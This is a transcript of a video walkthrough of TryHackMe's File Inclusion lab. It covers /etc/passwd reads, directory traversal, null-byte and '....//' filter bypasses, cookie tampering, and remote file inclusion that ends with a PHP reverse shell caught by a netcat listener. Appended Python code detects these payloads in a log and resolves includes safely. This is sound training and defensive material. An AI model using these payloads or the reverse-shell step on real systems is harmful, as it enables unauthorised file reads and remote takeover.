File Inclusion Vulnerability Explained | TryHackMe Junior Penetration Tester

Captions
Welcome back everyone. Today we will be talking about file inclusion. This room about file inclusion is part of the Junior Penetration Tester pathway; you can reach the room by clicking on the pathway and then clicking on File Inclusion. So basically in this room we will learn all of the tricks and techniques necessary for exploiting file inclusion vulnerabilities, or let me say detecting and exploiting file inclusion vulnerabilities. Let me start by saying that you have to first deploy the machine: click on Start Machine, you will get the IP address, and you can start answering the questions from task three all the way to task eight.

All right, so task three, we have one question. Right before doing that, let's copy the IP address and navigate through the browser. Burp Suite is off; let me re-establish the connection to the network, okay, and then again try to access the server. So upon opening the page we have around six labs and one playground. We will go over all of these labs, and throughout these labs we will go through scenarios of uncovering and exploiting file inclusion vulnerabilities.

So let's go to lab 1, click on lab 1. In lab 1 we have a form where we submit a file name; the file name should be appended with a PHP extension, as you can see, for example welcome.php is an example. So let's go with the form and type welcome.php. Include current path: this is /var/www/html, which is the path of the web server here. File content preview of welcome.php: this is the content of the welcome file. Now if you look at the browser, let me zoom in a bit, I guess this is better. Let's look at the URL here. In the URL we have lab1.php, which is a PHP file, and then we have file: file is the parameter, and welcome.php is the resource that is being handled by the file parameter. So basically a file inclusion vulnerability is all about trying to access other files on the system. We know that the handle here, or the parameter file, is used to access resources on the file system; the allowed resource in this case is the welcome.php file. So what if we would like to access other resources on the file system? The simplest form of file inclusion vulnerability is to remove this file and make the parameter file here refer to other resources on the system. An example would be viewing sensitive information such as /etc/passwd. As you can see, we were able to reveal the content of a sensitive file. This is the very primitive and simplest form of file inclusion vulnerability. This is an example of a website that you could see in the 80s or in the 70s, right? There are no filters, there is no checking, there are no permissions, there is no validation on the user inputs: a completely vulnerable site. That's the kind of site you would see in the 80s or in the 70s, as I said earlier; you wouldn't find this kind of website or vulnerability on the web now, but we start off with these kinds of scenarios to illustrate the vulnerability and understand the mechanism behind it. So as you can see here, much like SSRF that we talked about in the last video, we spot the parameter here and we see what the parameter is used for. In this case it's used to refer to files in the web server directory, so it means we can make the parameter refer to other files on the system such as sensitive documents, which marks the answer for the first question.

Task four: give lab 1 a try to read /etc/passwd; what would the request URL be? This is the answer. In lab 2, what is the directory specified in the include function? So let's go to lab 2; we finished lab 1, go to lab 2. Lab 2 seems to have the same structure: we have a PHP file, lab2, and here a form to include a file name. If we type welcome.php we see the content, or the output is similar to the one we saw in lab 1, "welcome to THM", and here is the directory of the web server. Now in any scenario where you are trying to uncover a vulnerability, you must first try the wrong input. Here we've supplied the right input; the output expected by the server is you supplying a welcome file, or a file that exists on the server. So what if we supplied a file that doesn't exist? For example, if we type hi.php, or just type hi, the file actually doesn't exist, so the server throws an error saying "warning: include includes/hi.php". As you can see, based on the output, the web server is looking for the files you supply in the form in the includes directory. So the include function looks for the files in the includes directory; if it finds a match it just prints the content of the file, if it doesn't find a match it throws an error, and this is the kind of error you see if the file doesn't exist. As you can see here, lab2.php exists in the web server directory and the server is actually using the include function to retrieve files from the includes directory. So lab2.php contains the include function, which retrieves files from the includes directory: includes/hi.php. Answering the question here, what is the directory specified in the include function? It is includes. Okay, next task.

So for the next task we go to labs three, four, five, six. All right, so how about we exploit this even if it's not required? Let's try to type etc/passwd. We couldn't do that; as you can see, include includes//etc/passwd, which means it couldn't retrieve the file because we added an extra slash here. What if we cancelled the extra slash here and only typed etc/passwd? Here also etc/passwd doesn't exist. All right, so what you can do here, I'm going to walk you through this: you can just use the directory traversal technique. Basically you are in the web server directory here, right? So if you want to use directory traversal you will have to go up in directories using the two dots: ../, ../. So before deciding how many dots and slashes, first you have to understand where you are right now. We are here, so in order to escape out of this directory we have to go up three steps, and one extra step to reach the etc directory. So what we do here, we type one, two, three, we are out of the web server now, and another one to reach the etc directory. If you do that you will be able to see the content of /etc/passwd. So we have typed four of them: the first three just to escape the web server directory, and the extra one here is to move up one level to reach the etc directory.

Okay, lab 3, what does it require? Try to read /etc/passwd; what does the request look like? All right, so here we have a simple form, and here we supply, as you can see, a file name. So if you type welcome without .php, without any extension: current path, and this is the content. Let's supply a wrong input, hi, and take a look at the error. The same here: we are at the web server directory, this is the PHP file, and here you see the include function. It looks for hi in the includes directory and it also appends the .php extension to hi, so since it didn't find hi.php it threw an error. So what to do now? Basically, as you can see, whatever we type in the box, the .php extension is added automatically to the input we add in the form. So if we try to type here, for example using directory traversal, etc/passwd, it's not going to work, as you can see. Why? Because the .php extension is appended to the passwd file, and indeed there is no file called passwd.php. So how can we bypass this? Let me say, it's not a filtering mechanism, it's a kind of working mechanism, right? So what we can do, we can add the null byte. If we add the null byte after our input we can make the web server ignore all of the characters that come after the null byte. Let's copy the null byte from here and try it. You see, we were successful in displaying the output of the passwd file. The null byte here, as I said earlier, makes the web server ignore all of the characters that come after the null byte, which means it's going to ignore the .php extension and you will be able to print out the content of the file. As you can see, file inclusion is closely connected to directory traversal, so you have to understand how to move up levels in the directory structure of the Linux file system. This is the answer for this question.

Next one: which function is causing the directory traversal in lab 4? Now we're done with lab 3, let's go to lab 4. So the question: which function is causing the directory traversal in lab 4? Okay, first let's do some experimentation. We supply first a wrong input, hi.php; you get an error, as you can see. Here we are under the web server directory and the PHP file is lab4. The lab4.php contains the function file_get_contents hi.php. So there is no specified directory here from which the function retrieves files, which means that it looks in the current working directory, which is /var/www/html. There is no hi.php, so it threw an error. Now if we want to display the content of the passwd file, again we tried the directory traversal trick, etc/passwd: "you're not allowed to see source files". That's interesting. So basically this message means that there is some filtering mechanism behind the scenes, right? But it also means that this is the right method to reach the /etc/passwd file; that's why we encountered this error message or statement. So basically there is a directory traversal vulnerability, there is a file inclusion vulnerability here, and the function here, file_get_contents, is the vulnerable function. So this is the answer for this question.

Try out lab 6 and check what is the directory that has to be in the input field. Okay, let's go to lab 6 now. What's the question? What is the directory that has to be in the input field? So this is an example: THM-profile/tryhackme.txt is an example where any parameter used in the URL equals a directory/file. So let's type THM/1.txt. We are under the /var/www/html directory and the lab6.php file handles the include function, which retrieves the files under the THM-profile directory. So that is the directory being asked about in the question.

Try out lab 6 and read /etc/os-release; what is the VERSION_ID value? So here we're required to read a sensitive file on the system which contains information about the operating system. Now we know that appending THM, or appending the directory from which the files are retrieved, is a necessary step in building your payload. Basically, any payload you build has to include THM-profile, since it is necessary for retrieving files from the directory. So if we type something here like this, let me build the URL first in the box, so those who are using mobile phones can see it clearly. THM-profile, right, and now we type something like... okay, so the question is os-release; let's try to view this file. Let's try first to omit this one and try with the directory traversal trick, three, four, and type etc/os-release: one, two, three, four, that's fine. Copy the URL and put it here: "access denied, allowed files THM-profile folder only". Okay, so let's add THM-profile. If we do it like this, let's see if we are able to access /etc/os-release, and we are successful. As I said earlier, it is very important to append the profile directory. So this is the operating system information, and this is the version; VERSION_ID is this one. So that is task 5. Task 6: there is no required answer for task 6, but I'm going to explain how to do remote file inclusion in the challenge. Remediation: no required answers. Challenge: okay, now go to the challenge.

The challenge: you can access the challenge using this URL. You have three challenges; go to challenge one. Challenge one: capture flag one at /etc/flag1. Okay, so once you open challenge one we are presented with a statement: the input form is broken, you need to send POST requests with the file parameter. Normally when we add something here we use a GET request, right? But the form will not work if we try the same way we tried in the previous labs, so we have to use a POST request. We can use POST requests either using Burp Suite by modifying the request, or we can use curl, which is my preferred way. So open a new terminal, and from here: curl, we specify -X for the request, POST, and then we specify the URL. So basically now we specified the URL and we specified the request method; then with -d we specify the data that we would like to post to the web application. So what we would like to do here, let's go back: the question is asking to read the content of the flag file, right? Okay, and also we have to change the method of the form. So if you right-click, click Inspect Element, you see the form. Where's the form? Okay, this is the start of the form here, and okay, that's fine. The method is GET; we have to change this, and also we will change the file parameter. So we have two parameters, file and method; these data can be set here. So method equals get and file equals, let's type /etc/flag1, and give it a try. If you read through the output you see here "file contents of /etc/flag1" and you get flag one. So that's what you have to do: just change the method to POST and you can directly read the flag file, no need for any kind of bypass mechanisms. Challenge one done; challenge two now. Go back, so refresh the page please. Let's refresh the page: "welcome guest, only admins can access this page". When you see restricted pages based on user credentials it means you have to play either with credentials or with the cookies. For that reason I'm going to turn on Burp Suite and refresh the page again to see what the request looks like. So we have a GET request and we also have the cookie THM=guest. Now if you change this to admin you will be able to access the page; forward. Now as you can see we are able to access the page, but that is not the end of things here. We display the content of the admin page: "welcome admin, this is an admin page, get the flag, the flag is /etc/flag2". So what we can do now, we can refresh the page one more time and take a look at the request. Again we are guest; let's change that to admin and now try to access /etc/flag2. Let's take a look at the error message. We are under /var/www/html, the challenge file is chall2.php, it uses the include function, which retrieves the files from the includes directory. As you can see here, everything went fine except two aspects: first, there is a .php extension appended to the end of the file, and there is one extra slash here. So the first step in getting rid of these obstacles is to first cancel the first slash, so type etc/flag2 and use the null character to bypass the extension filter. Let me look for the null byte; let's take that and paste it here. Forward, let's take a look. Now we get another error, but as you can see we were able to ignore the extension and we were able to cancel the extra slash. Now we have to do some sort of directory traversal. So let's refresh again and here type four to move up four levels, etc/pass, sorry, flag2, and the null byte. Let's see if this works, and this is the flag. So that is the second question.

Now the last one, or the third one, is kind of interesting: capture flag three at /etc/flag3. So let's cancel Burp Suite temporarily and go to challenge three. Challenge three: "include a file in the input form below". It's expecting welcome, so let's break the logic and type hi. This is a directory, and this is the file handling the form, and here we have the file using the include function; it is retrieving files under the same directory and it's also appending .php here, right? Now the regular method: let's copy the URL, and here we use directory traversal and type etc/flag3 and the null byte. Let me put the help here since I'm going to need it. So flag3, and we use the URL here; let's see what's going to happen. Okay, let's take a look now. Look at this: you see here the slash has been cancelled between etc and the flag, and we still get the .php extension. So basically it means there is some kind of string filter here that's cancelling the slash and the dots. What we can do here, we can just type two extra dots and one extra slash, the same here: two dots, extra slash, two dots, extra slash, two dots, extra slash, and try now. Why do we type two extra dots and one extra slash? Because the web application is using a filter that cancels everything once it sees two dots; it's going to cancel everything, right? So the end statement will be only etc flag. So we used two extra dots so that once the two dots are cancelled or omitted by the application, we have another two extra dots that protect the payload. We try this one and we see the same output. Okay, I think it's time to try a POST request. So here let's use this one, use the same payload; actually I'm going to use the same payload but the method will be POST, to see if this can make a difference. Here it will be method equals POST and the URL will change to three. Try this one; output. All right, let's take a look at this. So the POST request worked; as you can see, the include function now is trying to retrieve this file, and as you can see there are no changes in our payload, which means that the only trick that we should have done is changing the request method from GET to POST. Now with the same payload, what we would do here, we would just cancel the extra slashes, one here, two dots, also we have one here, two. Let's see if this will work, and as you can see this is the flag. So as a conclusion, there is no filtering on the application; the only thing you have to do is to change the method to POST, but it didn't say that out loud here that you have to use POST requests, it just left it to your instinct to discover that.

All right, so let's now move to the last question: gain RCE in lab playground/playground.php with RFI to execute the hostname command; what is the output? Okay, now we go to remote file inclusion. Go back to the main page, playground: "include a file in the input form below". Okay, hi: include hi, doesn't exist, no such file or directory. So remote file inclusion is about changing the value of the parameter here so that the parameter equals a URL on your server. An example would be retrieving content from your server, downloading that content to the target machine and also executing that content; an example would be reverse shells or text files, whatever you want to execute. So what's going to happen in remote file inclusion? Let's take an example: if we put here http://domain.com/shell.php, that's remote file inclusion. Now you make the web server, the target one, the include function here, what it will do, it's going to take the URL, make the request to domain.com/shell.php, retrieve the shell.php, download the file to the target machine and execute it. That's the danger of include functions without input validation. So now what we will do here, we will go to our machine and start our web server. Okay, let's split the view here, and now we create a simple PHP file, right? It could be a reverse shell, it could be any kind of file you would like to execute. A simple example to start off is a text file. This text file is, you know, written and made based on the challenge, so nano cmd, or cat cmd, based on the challenge requirements. It contains PHP code that will execute the hostname command. So now what's going to happen: I'm going to go back and replace domain.com with my own machine IP. ipconfig... ipconfig one more time... ah no, oh sorry, actually I confused that with Windows. So now we take that, change domain.com to the IP, don't forget the port, and here is cmd.txt. Now this is your payload; take that and enter. So this is the hostname, right? Now one more advanced step is to gain remote access to the machine. It's not required by the challenge, as you can see, but I'm going to do that as a bonus in this video. So let's go back and go to the repo directory, go to web shell tools, see the web shell, do I have the option, PHP web shell. So I'm going to upload a PHP reverse shell. All right, I'm going to start the Python server; yes, it's already in use, that's fine, I'm going to cancel this one and start it in the same directory where the PHP reverse shell exists. Okay, now let's take this one, and before doing that let's start the listener on my machine. So the listener could be here: nc -lvp 455, and hopefully we'll now receive a remote shell. So replace cmd.txt here with the file name, check it out, and we now have remote access on the machine: id, we are www-data; cd /var, and these are the files; cd /home, no users on the system. All right, I hope the explanation was comprehensive and thorough, and don't forget that I will also be adding the notes here to the channel. Also, if you want to have the notes, don't forget to subscribe to the channel membership. Thank you very much and see you in the next video.
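The walkthrough above exercises four payload shapes against the lab: an absolute path to a sensitive file, `../` directory traversal, a trailing null byte to defeat an appended `.php` extension (including the `....//` shape used against a filter that strips `../`), and a remote URL for RFI. The following detector is an added example, not code from the video or from TryHackMe; it runs the same recognition logic a defender would put in a log-monitoring rule over a constructed, tab-separated application log. The log lines, client addresses, the `10.9.0.2` server address and the log format itself are all made up for this example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed log: time, client, method, request target, form body (tab-separated).
# The lines are invented for this example; only the payload shapes mirror the video.
SAMPLE_LOG = "\n".join([
    "2021-10-30T10:00:01Z\t10.10.1.5\tGET\t/lab1.php?file=welcome.php\t",
    "2021-10-30T10:00:07Z\t10.10.1.5\tGET\t/lab1.php?file=/etc/passwd\t",
    "2021-10-30T10:01:12Z\t10.10.1.5\tGET\t/lab2.php?file=../../../../etc/passwd\t",
    "2021-10-30T10:02:30Z\t10.10.1.5\tGET\t/lab3.php?file=../../../../etc/passwd%00\t",
    "2021-10-30T10:03:44Z\t10.10.1.5\tGET\t/lab3.php?file=....//....//....//....//etc/flag3%00\t",
    "2021-10-30T10:04:02Z\t10.10.1.5\tPOST\t/lab3.php\tmethod=POST&file=/etc/flag1",
    "2021-10-30T10:05:19Z\t10.10.1.5\tGET\t/playground.php?file=http://10.9.0.2:8000/cmd.txt\t",
    "2021-10-30T10:06:00Z\t10.10.1.9\tGET\t/lab6.php?file=THM-profile/tryhackme.txt\t",
    "2021-10-30T10:06:30Z\t10.10.1.9\tGET\t/lab1.php?file=..%252F..%252F..%252Fetc%252Fpasswd\t",
])

SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)
# Files the walkthrough reads through the lab; extend with your own list.
SENSITIVE_SUFFIXES = ("etc/passwd", "etc/os-release")


def normalize(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads (%252F -> %2F -> /) unfold."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_value(raw):
    """Return the set of LFI/RFI indicators found in one parameter value."""
    value = normalize(raw)
    findings = set()
    if "\x00" in value:
        findings.add("null-byte")          # extension bypass, e.g. passwd%00
        value = value.split("\x00", 1)[0]  # inspect what the include would actually see
    segments = re.split(r"[\\/]+", value)
    if any(".." in seg for seg in segments):
        findings.add("traversal")          # ../, ..\, and filter-bypass shapes like ....//
    if SCHEME_RE.match(value):
        findings.add("remote-include")     # http://server/cmd.txt style RFI
    elif value.startswith("/"):
        findings.add("absolute-path")
    if value.endswith(SENSITIVE_SUFFIXES):
        findings.add("sensitive-file")
    return findings


def analyze_request(method, target, body=""):
    """Inspect every query-string and form-body parameter of one request."""
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    if body:  # POST bodies never appear in a plain access log; the app must log them
        params += parse_qsl(body, keep_blank_values=True)
    results = {}
    for name, value in params:
        hits = classify_value(value)
        if hits:
            results[name] = sorted(hits)
    return results


def scan_log(text):
    """Parse the constructed log and return one alert per suspicious request."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, target, body = (line.split("\t") + [""])[:5]
        hits = analyze_request(method, target, body)
        if hits:
            alerts.append({"time": ts, "client": client, "method": method,
                           "target": target, "params": hits})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["time"], alert["client"], alert["method"], alert["target"], alert["params"])
```

Two design points matter for the cases the video shows. Decoding has to be repeated before matching, otherwise `..%252F` slips past a rule written for `../`; and the `....//` shape is caught by looking for `..` inside any path segment rather than for the literal `../`, which is exactly the distinction the lab's stripping filter gets wrong. The POST line is included because the challenge in the video only works with a POST request; a detector fed from the web server's access log alone would never see that parameter.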
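The video closes by pointing at the root cause: an include function fed user input without validation. As an added example (not from the video or TryHackMe, and written in Python rather than the lab's PHP), here is a resolver that maps a user-supplied name onto a file inside a fixed include directory and refuses everything else. The `resolve_include` and `demo` names, the temporary `includes/` directory and the `secret.txt` file are constructed for the example; the payload shapes it is run against are the ones the walkthrough uses.

```python
import os
import tempfile
from urllib.parse import unquote


class IncludeError(ValueError):
    """Raised for any include request that must not be served."""


def resolve_include(base_dir, user_value, allowed_ext=".php", allowlist=None):
    """Return the real path of the file to include, or raise IncludeError.

    Checks, in the order the lab's bypasses would otherwise hit them:
      1. null bytes never reach the filesystem layer;
      2. absolute paths and URLs (scheme://) are refused, so RFI is impossible;
      3. the extension is appended only after the null-byte check;
      4. the resolved real path must stay inside base_dir (defeats ../, ....//, symlinks);
      5. an optional allowlist pins the include to known file names.
    """
    value = unquote(user_value)  # framework decoding usually already did this once
    if "\x00" in value:
        raise IncludeError("null byte in file name")
    if "://" in value or value.startswith(("/", "\\")):
        raise IncludeError("absolute paths and URLs are not allowed")
    if allowed_ext and not value.endswith(allowed_ext):
        value += allowed_ext
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, value))
    if os.path.commonpath([base, candidate]) != base:
        raise IncludeError("path escapes the include directory")
    relative = os.path.relpath(candidate, base)
    if allowlist is not None and relative not in allowlist:
        raise IncludeError("file is not on the allowlist")
    if not os.path.isfile(candidate):
        raise IncludeError("no such include")
    return candidate


def demo():
    """Build a throwaway include directory and run the walkthrough's payload shapes at it.

    Returns {payload: "served:<name>" or "rejected:<reason>"} so every outcome is checkable.
    """
    root = tempfile.mkdtemp()
    includes = os.path.join(root, "includes")
    os.mkdir(includes)
    with open(os.path.join(includes, "welcome.php"), "w") as fh:
        fh.write("<?php echo 'Welcome to THM'; ?>\n")
    with open(os.path.join(root, "secret.txt"), "w") as fh:  # outside the include dir
        fh.write("must never be served\n")

    payloads = [
        "welcome",                        # the intended use: name without extension
        "welcome.php",                    # name with extension
        "../secret.txt",                  # plain traversal
        "../secret.txt%00",               # traversal plus null-byte extension bypass
        "....//secret.txt",               # strip-filter bypass shape
        "/etc/passwd",                    # absolute path
        "http://10.9.0.2:8000/cmd.txt",   # remote file inclusion
    ]
    results = {}
    for payload in payloads:
        try:
            path = resolve_include(includes, payload, allowlist={"welcome.php"})
            results[payload] = "served:" + os.path.relpath(path, includes)
        except IncludeError as err:
            results[payload] = "rejected:" + str(err)
    return results


if __name__ == "__main__":
    for payload, outcome in demo().items():
        print(f"{payload!r:36} -> {outcome}")
```

The containment check is the one that does the real work: it compares `realpath` results, so it does not matter whether the input arrived as `../`, `....//`, or a symlink planted inside the directory, and no string stripping is involved that an attacker could race against. The allowlist is belt-and-braces; without it, `....//secret.txt` is still refused because nothing of that name exists inside `includes/`.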
Info
Channel: Motasem Hamdan
Views: 52,637
Keywords: File inclusion
Id: bMnuXZ70YdU
Length: 34min 6sec (2046 seconds)
Published: Sat Oct 30 2021